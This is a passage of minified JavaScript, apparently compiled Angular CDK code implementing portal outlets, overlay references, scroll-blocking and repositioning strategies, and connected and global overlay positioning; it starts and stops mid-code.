d=c.element,T=this._document.createComment("dom-portal");d.parentNode.insertBefore(T,d),this.outletElement.appendChild(d),this._attachedPortal=c,super.setDisposeFn(()=>{T.parentNode&&T.parentNode.replaceChild(d,T)})},this._document=r}attachComponentPortal(a){const i=(a.componentFactoryResolver||this._componentFactoryResolver).resolveComponentFactory(a.component);let n;return a.viewContainerRef?(n=a.viewContainerRef.createComponent(i,a.viewContainerRef.length,a.injector||a.viewContainerRef.injector),this.setDisposeFn(()=>n.destroy())):(n=i.create(a.injector||this._defaultInjector||Ko.NULL),this._appRef.attachView(n.hostView),this.setDisposeFn(()=>{this._appRef.viewCount>0&&this._appRef.detachView(n.hostView),n.destroy()})),this.outletElement.appendChild(this._getComponentRootNode(n)),this._attachedPortal=a,n}attachTemplatePortal(a){let e=a.viewContainerRef,i=e.createEmbeddedView(a.templateRef,a.context,{injector:a.injector});return i.rootNodes.forEach(n=>this.outletElement.appendChild(n)),i.detectChanges(),this.setDisposeFn(()=>{let n=e.indexOf(i);-1!==n&&e.remove(n)}),this._attachedPortal=a,i}dispose(){super.dispose(),this.outletElement.remove()}_getComponentRootNode(a){return a.hostView.rootNodes[0]}}let N_e=(()=>{class t extends Mm{constructor(e,i){super(e,i)}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho),Ee(fo))},t.\u0275dir=Ot({type:t,selectors:[["","cdkPortal",""]],exportAs:["cdkPortal"],features:[ci]}),t})(),Cu=(()=>{class t extends eA{constructor(e,i,n){super(),this._componentFactoryResolver=e,this._viewContainerRef=i,this._isInitialized=!1,this.attached=new Tt,this.attachDomPortal=r=>{const c=r.element,d=this._document.createComment("dom-portal");r.setAttachedHost(this),c.parentNode.insertBefore(d,c),this._getRootNode().appendChild(c),this._attachedPortal=r,super.setDisposeFn(()=>{d.parentNode&&d.parentNode.replaceChild(c,d)})},this._document=n}get portal(){return this._attachedPortal}set portal(e){this.hasAttached()&&!e&&!this._isInitialized||(this.hasAttached()&&super.detach(),e&&super.attach(e),this._attachedPortal=e||null)}get attachedRef(){return this._attachedRef}ngOnInit(){this._isInitialized=!0}ngOnDestroy(){super.dispose(),this._attachedPortal=null,this._attachedRef=null}attachComponentPortal(e){e.setAttachedHost(this);const i=null!=e.viewContainerRef?e.viewContainerRef:this._viewContainerRef,r=(e.componentFactoryResolver||this._componentFactoryResolver).resolveComponentFactory(e.component),c=i.createComponent(r,i.length,e.injector||i.injector);return i!==this._viewContainerRef&&this._getRootNode().appendChild(c.hostView.rootNodes[0]),super.setDisposeFn(()=>c.destroy()),this._attachedPortal=e,this._attachedRef=c,this.attached.emit(c),c}attachTemplatePortal(e){e.setAttachedHost(this);const i=this._viewContainerRef.createEmbeddedView(e.templateRef,e.context,{injector:e.injector});return super.setDisposeFn(()=>this._viewContainerRef.clear()),this._attachedPortal=e,this._attachedRef=i,this.attached.emit(i),i}_getRootNode(){const e=this._viewContainerRef.element.nativeElement;return e.nodeType===e.ELEMENT_NODE?e:e.parentNode}}return t.\u0275fac=function(e){return new(e||t)(Ee(On),Ee(fo),Ee(ga))},t.\u0275dir=Ot({type:t,selectors:[["","cdkPortalOutlet",""]],inputs:{portal:["cdkPortalOutlet","portal"]},outputs:{attached:"attached"},exportAs:["cdkPortalOutlet"],features:[ci]}),t})(),yu=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();const KW=Mz();class L_e{constructor(a,e){this._viewportRuler=a,this._previousHTMLStyles={top:"",left:""},this._isEnabled=!1,this._document=e}attach(){}enable(){if(this._canBeEnabled()){const a=this._document.documentElement;this._previousScrollPosition=this._viewportRuler.getViewportScrollPosition(),this._previousHTMLStyles.left=a.style.left||"",this._previousHTMLStyles.top=a.style.top||"",a.style.left=Ms(-this._previousScrollPosition.left),a.style.top=Ms(-this._previousScrollPosition.top),a.classList.add("cdk-global-scrollblock"),this._isEnabled=!0}}disable(){if(this._isEnabled){const a=this._document.documentElement,i=a.style,n=this._document.body.style,r=i.scrollBehavior||"",c=n.scrollBehavior||"";this._isEnabled=!1,i.left=this._previousHTMLStyles.left,i.top=this._previousHTMLStyles.top,a.classList.remove("cdk-global-scrollblock"),KW&&(i.scrollBehavior=n.scrollBehavior="auto"),window.scroll(this._previousScrollPosition.left,this._previousScrollPosition.top),KW&&(i.scrollBehavior=r,n.scrollBehavior=c)}}_canBeEnabled(){if(this._document.documentElement.classList.contains("cdk-global-scrollblock")||this._isEnabled)return!1;const e=this._document.body,i=this._viewportRuler.getViewportSize();return e.scrollHeight>i.height||e.scrollWidth>i.width}}class z_e{constructor(a,e,i,n){this._scrollDispatcher=a,this._ngZone=e,this._viewportRuler=i,this._config=n,this._scrollSubscription=null,this._detach=()=>{this.disable(),this._overlayRef.hasAttached()&&this._ngZone.run(()=>this._overlayRef.detach())}}attach(a){this._overlayRef=a}enable(){if(this._scrollSubscription)return;const a=this._scrollDispatcher.scrolled(0);this._config&&this._config.threshold&&this._config.threshold>1?(this._initialScrollPosition=this._viewportRuler.getViewportScrollPosition().top,this._scrollSubscription=a.subscribe(()=>{const e=this._viewportRuler.getViewportScrollPosition().top;Math.abs(e-this._initialScrollPosition)>this._config.threshold?this._detach():this._overlayRef.updatePosition()})):this._scrollSubscription=a.subscribe(this._detach)}disable(){this._scrollSubscription&&(this._scrollSubscription.unsubscribe(),this._scrollSubscription=null)}detach(){this.disable(),this._overlayRef=null}}class XW{enable(){}disable(){}attach(){}}function e8(t,a){return a.some(e=>t.bottom<e.top||t.top>e.bottom||t.right<e.left||t.left>e.right)}function YW(t,a){return a.some(e=>t.top<e.top||t.bottom>e.bottom||t.left<e.left||t.right>e.right)}class W_e{constructor(a,e,i,n){this._scrollDispatcher=a,this._viewportRuler=e,this._ngZone=i,this._config=n,this._scrollSubscription=null}attach(a){this._overlayRef=a}enable(){this._scrollSubscription||(this._scrollSubscription=this._scrollDispatcher.scrolled(this._config?this._config.scrollThrottle:0).subscribe(()=>{if(this._overlayRef.updatePosition(),this._config&&this._config.autoClose){const e=this._overlayRef.overlayElement.getBoundingClientRect(),{width:i,height:n}=this._viewportRuler.getViewportSize();e8(e,[{width:i,height:n,bottom:n,right:i,top:0,left:0}])&&(this.disable(),this._ngZone.run(()=>this._overlayRef.detach()))}}))}disable(){this._scrollSubscription&&(this._scrollSubscription.unsubscribe(),this._scrollSubscription=null)}detach(){this.disable(),this._overlayRef=null}}let F_e=(()=>{class t{constructor(e,i,n,r){this._scrollDispatcher=e,this._viewportRuler=i,this._ngZone=n,this.noop=()=>new XW,this.close=c=>new z_e(this._scrollDispatcher,this._ngZone,this._viewportRuler,c),this.block=()=>new L_e(this._viewportRuler,this._document),this.reposition=c=>new W_e(this._scrollDispatcher,this._viewportRuler,this._ngZone,c),this._document=r}}return t.\u0275fac=function(e){return new(e||t)(At(By),At(bm),At(qi),At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();class bg{constructor(a){if(this.scrollStrategy=new XW,this.panelClass="",this.hasBackdrop=!1,this.backdropClass="cdk-overlay-dark-backdrop",this.disposeOnNavigation=!1,a){const e=Object.keys(a);for(const i of e)void 0!==a[i]&&(this[i]=a[i])}}}class V_e{constructor(a,e){this.connectionPair=a,this.scrollableViewProperties=e}}class nb{constructor(a,e,i,n,r,c,d,T,k,q=!1){this._portalOutlet=a,this._host=e,this._pane=i,this._config=n,this._ngZone=r,this._keyboardDispatcher=c,this._document=d,this._location=T,this._outsideClickDispatcher=k,this._animationsDisabled=q,this._backdropElement=null,this._backdropClick=new J,this._attachments=new J,this._detachments=new J,this._locationChanges=I.EMPTY,this._backdropClickHandler=Y=>this._backdropClick.next(Y),this._backdropTransitionendHandler=Y=>{this._disposeBackdrop(Y.target)},this._keydownEvents=new J,this._outsidePointerEvents=new J,n.scrollStrategy&&(this._scrollStrategy=n.scrollStrategy,this._scrollStrategy.attach(this)),this._positionStrategy=n.positionStrategy}get overlayElement(){return this._pane}get backdropElement(){return this._backdropElement}get hostElement(){return this._host}attach(a){!this._host.parentElement&&this._previousHostParent&&this._previousHostParent.appendChild(this._host);const e=this._portalOutlet.attach(a);return this._positionStrategy&&this._positionStrategy.attach(this),this._updateStackingOrder(),this._updateElementSize(),this._updateElementDirection(),this._scrollStrategy&&this._scrollStrategy.enable(),this._ngZone.onStable.pipe(Cn(1)).subscribe(()=>{this.hasAttached()&&this.updatePosition()}),this._togglePointerEvents(!0),this._config.hasBackdrop&&this._attachBackdrop(),this._config.panelClass&&this._toggleClasses(this._pane,this._config.panelClass,!0),this._attachments.next(),this._keyboardDispatcher.add(this),this._config.disposeOnNavigation&&(this._locationChanges=this._location.subscribe(()=>this.dispose())),this._outsideClickDispatcher.add(this),"function"==typeof(null==e?void 0:e.onDestroy)&&e.onDestroy(()=>{this.hasAttached()&&this._ngZone.runOutsideAngular(()=>Promise.resolve().then(()=>this.detach()))}),e}detach(){if(!this.hasAttached())return;this.detachBackdrop(),this._togglePointerEvents(!1),this._positionStrategy&&this._positionStrategy.detach&&this._positionStrategy.detach(),this._scrollStrategy&&this._scrollStrategy.disable();const a=this._portalOutlet.detach();return this._detachments.next(),this._keyboardDispatcher.remove(this),this._detachContentWhenStable(),this._locationChanges.unsubscribe(),this._outsideClickDispatcher.remove(this),a}dispose(){var a;const e=this.hasAttached();this._positionStrategy&&this._positionStrategy.dispose(),this._disposeScrollStrategy(),this._disposeBackdrop(this._backdropElement),this._locationChanges.unsubscribe(),this._keyboardDispatcher.remove(this),this._portalOutlet.dispose(),this._attachments.complete(),this._backdropClick.complete(),this._keydownEvents.complete(),this._outsidePointerEvents.complete(),this._outsideClickDispatcher.remove(this),null===(a=this._host)||void 0===a||a.remove(),this._previousHostParent=this._pane=this._host=null,e&&this._detachments.next(),this._detachments.complete()}hasAttached(){return this._portalOutlet.hasAttached()}backdropClick(){return this._backdropClick}attachments(){return this._attachments}detachments(){return this._detachments}keydownEvents(){return this._keydownEvents}outsidePointerEvents(){return this._outsidePointerEvents}getConfig(){return this._config}updatePosition(){this._positionStrategy&&this._positionStrategy.apply()}updatePositionStrategy(a){a!==this._positionStrategy&&(this._positionStrategy&&this._positionStrategy.dispose(),this._positionStrategy=a,this.hasAttached()&&(a.attach(this),this.updatePosition()))}updateSize(a){this._config=Object.assign(Object.assign({},this._config),a),this._updateElementSize()}setDirection(a){this._config=Object.assign(Object.assign({},this._config),{direction:a}),this._updateElementDirection()}addPanelClass(a){this._pane&&this._toggleClasses(this._pane,a,!0)}removePanelClass(a){this._pane&&this._toggleClasses(this._pane,a,!1)}getDirection(){const a=this._config.direction;return a?"string"==typeof a?a:a.value:"ltr"}updateScrollStrategy(a){a!==this._scrollStrategy&&(this._disposeScrollStrategy(),this._scrollStrategy=a,this.hasAttached()&&(a.attach(this),a.enable()))}_updateElementDirection(){this._host.setAttribute("dir",this.getDirection())}_updateElementSize(){if(!this._pane)return;const a=this._pane.style;a.width=Ms(this._config.width),a.height=Ms(this._config.height),a.minWidth=Ms(this._config.minWidth),a.minHeight=Ms(this._config.minHeight),a.maxWidth=Ms(this._config.maxWidth),a.maxHeight=Ms(this._config.maxHeight)}_togglePointerEvents(a){this._pane.style.pointerEvents=a?"":"none"}_attachBackdrop(){const a="cdk-overlay-backdrop-showing";this._backdropElement=this._document.createElement("div"),this._backdropElement.classList.add("cdk-overlay-backdrop"),this._animationsDisabled&&this._backdropElement.classList.add("cdk-overlay-backdrop-noop-animation"),this._config.backdropClass&&this._toggleClasses(this._backdropElement,this._config.backdropClass,!0),this._host.parentElement.insertBefore(this._backdropElement,this._host),this._backdropElement.addEventListener("click",this._backdropClickHandler),this._animationsDisabled||"undefined"==typeof requestAnimationFrame?this._backdropElement.classList.add(a):this._ngZone.runOutsideAngular(()=>{requestAnimationFrame(()=>{this._backdropElement&&this._backdropElement.classList.add(a)})})}_updateStackingOrder(){this._host.nextSibling&&this._host.parentNode.appendChild(this._host)}detachBackdrop(){const a=this._backdropElement;if(a){if(this._animationsDisabled)return void this._disposeBackdrop(a);a.classList.remove("cdk-overlay-backdrop-showing"),this._ngZone.runOutsideAngular(()=>{a.addEventListener("transitionend",this._backdropTransitionendHandler)}),a.style.pointerEvents="none",this._backdropTimeout=this._ngZone.runOutsideAngular(()=>setTimeout(()=>{this._disposeBackdrop(a)},500))}}_toggleClasses(a,e,i){const n=Oy(e||[]).filter(r=>!!r);n.length&&(i?a.classList.add(...n):a.classList.remove(...n))}_detachContentWhenStable(){this._ngZone.runOutsideAngular(()=>{const a=this._ngZone.onStable.pipe(ea(ra(this._attachments,this._detachments))).subscribe(()=>{(!this._pane||!this._host||0===this._pane.children.length)&&(this._pane&&this._config.panelClass&&this._toggleClasses(this._pane,this._config.panelClass,!1),this._host&&this._host.parentElement&&(this._previousHostParent=this._host.parentElement,this._host.remove()),a.unsubscribe())})})}_disposeScrollStrategy(){const a=this._scrollStrategy;a&&(a.disable(),a.detach&&a.detach())}_disposeBackdrop(a){a&&(a.removeEventListener("click",this._backdropClickHandler),a.removeEventListener("transitionend",this._backdropTransitionendHandler),a.remove(),this._backdropElement===a&&(this._backdropElement=null)),this._backdropTimeout&&(clearTimeout(this._backdropTimeout),this._backdropTimeout=void 0)}}let ob=(()=>{class t{constructor(e,i){this._platform=i,this._document=e}ngOnDestroy(){var e;null===(e=this._containerElement)||void 0===e||e.remove()}getContainerElement(){return this._containerElement||this._createContainer(),this._containerElement}_createContainer(){const e="cdk-overlay-container";if(this._platform.isBrowser||rw()){const n=this._document.querySelectorAll(`.${e}[platform="server"], .${e}[platform="test"]`);for(let r=0;r<n.length;r++)n[r].remove()}const i=this._document.createElement("div");i.classList.add(e),rw()?i.setAttribute("platform","test"):this._platform.isBrowser||i.setAttribute("platform","server"),this._document.body.appendChild(i),this._containerElement=i}}return t.\u0275fac=function(e){return new(e||t)(At(ga),At(sr))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const JW="cdk-overlay-connected-position-bounding-box",B_e=/([A-Za-z%]+)$/;class H_e{constructor(a,e,i,n,r){this._viewportRuler=e,this._document=i,this._platform=n,this._overlayContainer=r,this._lastBoundingBoxSize={width:0,height:0},this._isPushed=!1,this._canPush=!0,this._growAfterOpen=!1,this._hasFlexibleDimensions=!0,this._positionLocked=!1,this._viewportMargin=0,this._scrollables=[],this._preferredPositions=[],this._positionChanges=new J,this._resizeSubscription=I.EMPTY,this._offsetX=0,this._offsetY=0,this._appliedPanelClasses=[],this.positionChanges=this._positionChanges,this.setOrigin(a)}get positions(){return this._preferredPositions}attach(a){this._validatePositions(),a.hostElement.classList.add(JW),this._overlayRef=a,this._boundingBox=a.hostElement,this._pane=a.overlayElement,this._isDisposed=!1,this._isInitialRender=!0,this._lastPosition=null,this._resizeSubscription.unsubscribe(),this._resizeSubscription=this._viewportRuler.change().subscribe(()=>{this._isInitialRender=!0,this.apply()})}apply(){if(this._isDisposed||!this._platform.isBrowser)return;if(!this._isInitialRender&&this._positionLocked&&this._lastPosition)return void this.reapplyLastPosition();this._clearPanelClasses(),this._resetOverlayElementStyles(),this._resetBoundingBoxStyles(),this._viewportRect=this._getNarrowedViewportRect(),this._originRect=this._getOriginRect(),this._overlayRect=this._pane.getBoundingClientRect(),this._containerRect=this._overlayContainer.getContainerElement().getBoundingClientRect();const a=this._originRect,e=this._overlayRect,i=this._viewportRect,n=this._containerRect,r=[];let c;for(let d of this._preferredPositions){let T=this._getOriginPoint(a,n,d),k=this._getOverlayPoint(T,e,d),q=this._getOverlayFit(k,e,i,d);if(q.isCompletelyWithinViewport)return this._isPushed=!1,void this._applyPosition(d,T);this._canFitWithFlexibleDimensions(q,k,i)?r.push({position:d,origin:T,overlayRect:e,boundingBoxRect:this._calculateBoundingBoxRect(T,d)}):(!c||c.overlayFit.visibleArea<q.visibleArea)&&(c={overlayFit:q,overlayPoint:k,originPoint:T,position:d,overlayRect:e})}if(r.length){let d=null,T=-1;for(const k of r){const q=k.boundingBoxRect.width*k.boundingBoxRect.height*(k.position.weight||1);q>T&&(T=q,d=k)}return this._isPushed=!1,void this._applyPosition(d.position,d.origin)}if(this._canPush)return this._isPushed=!0,void this._applyPosition(c.position,c.originPoint);this._applyPosition(c.position,c.originPoint)}detach(){this._clearPanelClasses(),this._lastPosition=null,this._previousPushAmount=null,this._resizeSubscription.unsubscribe()}dispose(){this._isDisposed||(this._boundingBox&&Mg(this._boundingBox.style,{top:"",left:"",right:"",bottom:"",height:"",width:"",alignItems:"",justifyContent:""}),this._pane&&this._resetOverlayElementStyles(),this._overlayRef&&this._overlayRef.hostElement.classList.remove(JW),this.detach(),this._positionChanges.complete(),this._overlayRef=this._boundingBox=null,this._isDisposed=!0)}reapplyLastPosition(){if(this._isDisposed||!this._platform.isBrowser)return;const a=this._lastPosition;if(a){this._originRect=this._getOriginRect(),this._overlayRect=this._pane.getBoundingClientRect(),this._viewportRect=this._getNarrowedViewportRect(),this._containerRect=this._overlayContainer.getContainerElement().getBoundingClientRect();const e=this._getOriginPoint(this._originRect,this._containerRect,a);this._applyPosition(a,e)}else this.apply()}withScrollableContainers(a){return this._scrollables=a,this}withPositions(a){return this._preferredPositions=a,-1===a.indexOf(this._lastPosition)&&(this._lastPosition=null),this._validatePositions(),this}withViewportMargin(a){return this._viewportMargin=a,this}withFlexibleDimensions(a=!0){return this._hasFlexibleDimensions=a,this}withGrowAfterOpen(a=!0){return this._growAfterOpen=a,this}withPush(a=!0){return this._canPush=a,this}withLockedPosition(a=!0){return this._positionLocked=a,this}setOrigin(a){return this._origin=a,this}withDefaultOffsetX(a){return this._offsetX=a,this}withDefaultOffsetY(a){return this._offsetY=a,this}withTransformOriginOn(a){return this._transformOriginSelector=a,this}_getOriginPoint(a,e,i){let n,r;if("center"==i.originX)n=a.left+a.width/2;else{const c=this._isRtl()?a.right:a.left,d=this._isRtl()?a.left:a.right;n="start"==i.originX?c:d}return e.left<0&&(n-=e.left),r="center"==i.originY?a.top+a.height/2:"top"==i.originY?a.top:a.bottom,e.top<0&&(r-=e.top),{x:n,y:r}}_getOverlayPoint(a,e,i){let n,r;return n="center"==i.overlayX?-e.width/2:"start"===i.overlayX?this._isRtl()?-e.width:0:this._isRtl()?0:-e.width,r="center"==i.overlayY?-e.height/2:"top"==i.overlayY?0:-e.height,{x:a.x+n,y:a.y+r}}_getOverlayFit(a,e,i,n){const r=eF(e);let{x:c,y:d}=a,T=this._getOffset(n,"x"),k=this._getOffset(n,"y");T&&(c+=T),k&&(d+=k);let te=0-d,pe=d+r.height-i.height,Re=this._subtractOverflows(r.width,0-c,c+r.width-i.width),Fe=this._subtractOverflows(r.height,te,pe),Ne=Re*Fe;return{visibleArea:Ne,isCompletelyWithinViewport:r.width*r.height===Ne,fitsInViewportVertically:Fe===r.height,fitsInViewportHorizontally:Re==r.width}}_canFitWithFlexibleDimensions(a,e,i){if(this._hasFlexibleDimensions){const n=i.bottom-e.y,r=i.right-e.x,c=ZW(this._overlayRef.getConfig().minHeight),d=ZW(this._overlayRef.getConfig().minWidth),k=a.fitsInViewportHorizontally||null!=d&&d<=r;return(a.fitsInViewportVertically||null!=c&&c<=n)&&k}return!1}_pushOverlayOnScreen(a,e,i){if(this._previousPushAmount&&this._positionLocked)return{x:a.x+this._previousPushAmount.x,y:a.y+this._previousPushAmount.y};const n=eF(e),r=this._viewportRect,c=Math.max(a.x+n.width-r.width,0),d=Math.max(a.y+n.height-r.height,0),T=Math.max(r.top-i.top-a.y,0),k=Math.max(r.left-i.left-a.x,0);let q=0,Y=0;return q=n.width<=r.width?k||-c:a.x<this._viewportMargin?r.left-i.left-a.x:0,Y=n.height<=r.height?T||-d:a.y<this._viewportMargin?r.top-i.top-a.y:0,this._previousPushAmount={x:q,y:Y},{x:a.x+q,y:a.y+Y}}_applyPosition(a,e){if(this._setTransformOrigin(a),this._setOverlayElementStyles(e,a),this._setBoundingBoxStyles(e,a),a.panelClass&&this._addPanelClasses(a.panelClass),this._lastPosition=a,this._positionChanges.observers.length){const i=this._getScrollVisibility(),n=new V_e(a,i);this._positionChanges.next(n)}this._isInitialRender=!1}_setTransformOrigin(a){if(!this._transformOriginSelector)return;const e=this._boundingBox.querySelectorAll(this._transformOriginSelector);let i,n=a.overlayY;i="center"===a.overlayX?"center":this._isRtl()?"start"===a.overlayX?"right":"left":"start"===a.overlayX?"left":"right";for(let r=0;r<e.length;r++)e[r].style.transformOrigin=`${i} ${n}`}_calculateBoundingBoxRect(a,e){const i=this._viewportRect,n=this._isRtl();let r,c,d,q,Y,te;if("top"===e.overlayY)c=a.y,r=i.height-c+this._viewportMargin;else if("bottom"===e.overlayY)d=i.height-a.y+2*this._viewportMargin,r=i.height-d+this._viewportMargin;else{const pe=Math.min(i.bottom-a.y+i.top,a.y),Re=this._lastBoundingBoxSize.height;r=2*pe,c=a.y-pe,r>Re&&!this._isInitialRender&&!this._growAfterOpen&&(c=a.y-Re/2)}if("end"===e.overlayX&&!n||"start"===e.overlayX&&n)te=i.width-a.x+this._viewportMargin,q=a.x-this._viewportMargin;else if("start"===e.overlayX&&!n||"end"===e.overlayX&&n)Y=a.x,q=i.right-a.x;else{const pe=Math.min(i.right-a.x+i.left,a.x),Re=this._lastBoundingBoxSize.width;q=2*pe,Y=a.x-pe,q>Re&&!this._isInitialRender&&!this._growAfterOpen&&(Y=a.x-Re/2)}return{top:c,left:Y,bottom:d,right:te,width:q,height:r}}_setBoundingBoxStyles(a,e){const i=this._calculateBoundingBoxRect(a,e);!this._isInitialRender&&!this._growAfterOpen&&(i.height=Math.min(i.height,this._lastBoundingBoxSize.height),i.width=Math.min(i.width,this._lastBoundingBoxSize.width));const n={};if(this._hasExactPosition())n.top=n.left="0",n.bottom=n.right=n.maxHeight=n.maxWidth="",n.width=n.height="100%";else{const r=this._overlayRef.getConfig().maxHeight,c=this._overlayRef.getConfig().maxWidth;n.height=Ms(i.height),n.top=Ms(i.top),n.bottom=Ms(i.bottom),n.width=Ms(i.width),n.left=Ms(i.left),n.right=Ms(i.right),n.alignItems="center"===e.overlayX?"center":"end"===e.overlayX?"flex-end":"flex-start",n.justifyContent="center"===e.overlayY?"center":"bottom"===e.overlayY?"flex-end":"flex-start",r&&(n.maxHeight=Ms(r)),c&&(n.maxWidth=Ms(c))}this._lastBoundingBoxSize=i,Mg(this._boundingBox.style,n)}_resetBoundingBoxStyles(){Mg(this._boundingBox.style,{top:"0",left:"0",right:"0",bottom:"0",height:"",width:"",alignItems:"",justifyContent:""})}_resetOverlayElementStyles(){Mg(this._pane.style,{top:"",left:"",bottom:"",right:"",position:"",transform:""})}_setOverlayElementStyles(a,e){const i={},n=this._hasExactPosition(),r=this._hasFlexibleDimensions,c=this._overlayRef.getConfig();if(n){const q=this._viewportRuler.getViewportScrollPosition();Mg(i,this._getExactOverlayY(e,a,q)),Mg(i,this._getExactOverlayX(e,a,q))}else i.position="static";let d="",T=this._getOffset(e,"x"),k=this._getOffset(e,"y");T&&(d+=`translateX(${T}px) `),k&&(d+=`translateY(${k}px)`),i.transform=d.trim(),c.maxHeight&&(n?i.maxHeight=Ms(c.maxHeight):r&&(i.maxHeight="")),c.maxWidth&&(n?i.maxWidth=Ms(c.maxWidth):r&&(i.maxWidth="")),Mg(this._pane.style,i)}_getExactOverlayY(a,e,i){let n={top:"",bottom:""},r=this._getOverlayPoint(e,this._overlayRect,a);return this._isPushed&&(r=this._pushOverlayOnScreen(r,this._overlayRect,i)),"bottom"===a.overlayY?n.bottom=this._document.documentElement.clientHeight-(r.y+this._overlayRect.height)+"px":n.top=Ms(r.y),n}_getExactOverlayX(a,e,i){let c,n={left:"",right:""},r=this._getOverlayPoint(e,this._overlayRect,a);return this._isPushed&&(r=this._pushOverlayOnScreen(r,this._overlayRect,i)),c=this._isRtl()?"end"===a.overlayX?"left":"right":"end"===a.overlayX?"right":"left","right"===c?n.right=this._document.documentElement.clientWidth-(r.x+this._overlayRect.width)+"px":n.left=Ms(r.x),n}_getScrollVisibility(){const a=this._getOriginRect(),e=this._pane.getBoundingClientRect(),i=this._scrollables.map(n=>n.getElementRef().nativeElement.getBoundingClientRect());return{isOriginClipped:YW(a,i),isOriginOutsideView:e8(a,i),isOverlayClipped:YW(e,i),isOverlayOutsideView:e8(e,i)}}_subtractOverflows(a,...e){return e.reduce((i,n)=>i-Math.max(n,0),a)}_getNarrowedViewportRect(){const a=this._document.documentElement.clientWidth,e=this._document.documentElement.clientHeight,i=this._viewportRuler.getViewportScrollPosition();return{top:i.top+this._viewportMargin,left:i.left+this._viewportMargin,right:i.left+a-this._viewportMargin,bottom:i.top+e-this._viewportMargin,width:a-2*this._viewportMargin,height:e-2*this._viewportMargin}}_isRtl(){return"rtl"===this._overlayRef.getDirection()}_hasExactPosition(){return!this._hasFlexibleDimensions||this._isPushed}_getOffset(a,e){return"x"===e?null==a.offsetX?this._offsetX:a.offsetX:null==a.offsetY?this._offsetY:a.offsetY}_validatePositions(){}_addPanelClasses(a){this._pane&&Oy(a).forEach(e=>{""!==e&&-1===this._appliedPanelClasses.indexOf(e)&&(this._appliedPanelClasses.push(e),this._pane.classList.add(e))})}_clearPanelClasses(){this._pane&&(this._appliedPanelClasses.forEach(a=>{this._pane.classList.remove(a)}),this._appliedPanelClasses=[])}_getOriginRect(){const a=this._origin;if(a instanceof mi)return a.nativeElement.getBoundingClientRect();if(a instanceof Element)return a.getBoundingClientRect();const e=a.width||0,i=a.height||0;return{top:a.y,bottom:a.y+i,left:a.x,right:a.x+e,height:i,width:e}}}function Mg(t,a){for(let e in a)a.hasOwnProperty(e)&&(t[e]=a[e]);return t}function ZW(t){if("number"!=typeof t&&null!=t){const[a,e]=t.split(B_e);return e&&"px"!==e?null:parseFloat(a)}return t||null}function eF(t){return{top:Math.floor(t.top),right:Math.floor(t.right),bottom:Math.floor(t.bottom),left:Math.floor(t.left),width:Math.floor(t.width),height:Math.floor(t.height)}}const tF="cdk-global-overlay-wrapper";class U_e{constructor(){this._cssPosition="static",this._topOffset="",this._bottomOffset="",this._alignItems="",this._xPosition="",this._xOffset="",this._width="",this._height="",this._isDisposed=!1}attach(a){const e=a.getConfig();this._overlayRef=a,this._width&&!e.width&&a.updateSize({width:this._width}),this._height&&!e.height&&a.updateSize({height:this._height}),a.hostElement.classList.add(tF),this._isDisposed=!1}top(a=""){return this._bottomOffset="",this._topOffset=a,this._alignItems="flex-start",this}left(a=""){return this._xOffset=a,this._xPosition="left",this}bottom(a=""){return this._topOffset="",this._bottomOffset=a,this._alignItems="flex-end",this}right(a=""){return this._xOffset=a,this._xPosition="right",this}start(a=""){return this._xOffset=a,this._xPosition="start",this}end(a=""){return this._xOffset=a,this._xPosition="end",this}width(a=""){return this._overlayRef?this._overlayRef.updateSize({width:a}):this._width=a,this}height(a=""){return this._overlayRef?this._overlayRef.updateSize({height:a}):this._height=a,this}centerHorizontally(a=""){return this.left(a),this._xPosition="center",this}centerVertically(a=""){return this.top(a),this._alignItems="center",this}apply(){if(!this._overlayRef||!this._overlayRef.hasAttached())return;const a=this._overlayRef.overlayElement.style,e=this._overlayRef.hostElement.style,i=this._overlayRef.getConfig(),{width:n,height:r,maxWidth:c,maxHeight:d}=i,T=!("100%"!==n&&"100vw"!==n||c&&"100%"!==c&&"100vw"!==c),k=!("100%"!==r&&"100vh"!==r||d&&"100%"!==d&&"100vh"!==d),q=this._xPosition,Y=this._xOffset,te="rtl"===this._overlayRef.getConfig().direction;let pe="",Re="",Fe="";T?Fe="flex-start":"center"===q?(Fe="center",te?Re=Y:pe=Y):te?"left"===q||"end"===q?(Fe="flex-end",pe=Y):("right"===q||"start"===q)&&(Fe="flex-start",Re=Y):"left"===q||"start"===q?(Fe="flex-start",pe=Y):("right"===q||"end"===q)&&(Fe="flex-end",Re=Y),a.position=this._cssPosition,a.marginLeft=T?"0":pe,a.marginTop=k?"0":this._topOffset,a.marginBottom=this._bottomOffset,a.marginRight=T?"0":Re,e.justifyContent=Fe,e.alignItems=k?"flex-start":this._alignItems}dispose(){if(this._isDisposed||!this._overlayRef)return;const a=this._overlayRef.overlayElement.style,e=this._overlayRef.hostElement,i=e.style;e.classList.remove(tF),i.justifyContent=i.alignItems=a.marginTop=a.marginBottom=a.marginLeft=a.marginRight=a.position="",this._overlayRef=null,this._isDisposed=!0}}let q_e=(()=>{class t{constructor(e,i,n,r){this._viewportRuler=e,this._document=i,this._platform=n,this._overlayContainer=r}global(){return new U_e}flexibleConnectedTo(e){return new H_e(e,this._viewportRuler,this._document,this._platform,this._overlayContainer)}}return t.\u0275fac=function(e){return new(e||t)(At(bm),At(ga),At(sr),At(ob))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),iF=(()=>{class t{constructor(e){this._attachedOverlays=[],this._document=e}ngOnDestroy(){this.detach()}add(e){this.remove(e),this._attachedOverlays.push(e)}remove(e){const i=this._attachedOverlays.indexOf(e);i>-1&&this._attachedOverlays.splice(i,1),0===this._attachedOverlays.length&&this.detach()}}return t.\u0275fac=function(e){return new(e||t)(At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),G_e=(()=>{class t extends iF{constructor(e,i){super(e),this._ngZone=i,this._keydownListener=n=>{const r=this._attachedOverlays;for(let c=r.length-1;c>-1;c--)if(r[c]._keydownEvents.observers.length>0){const 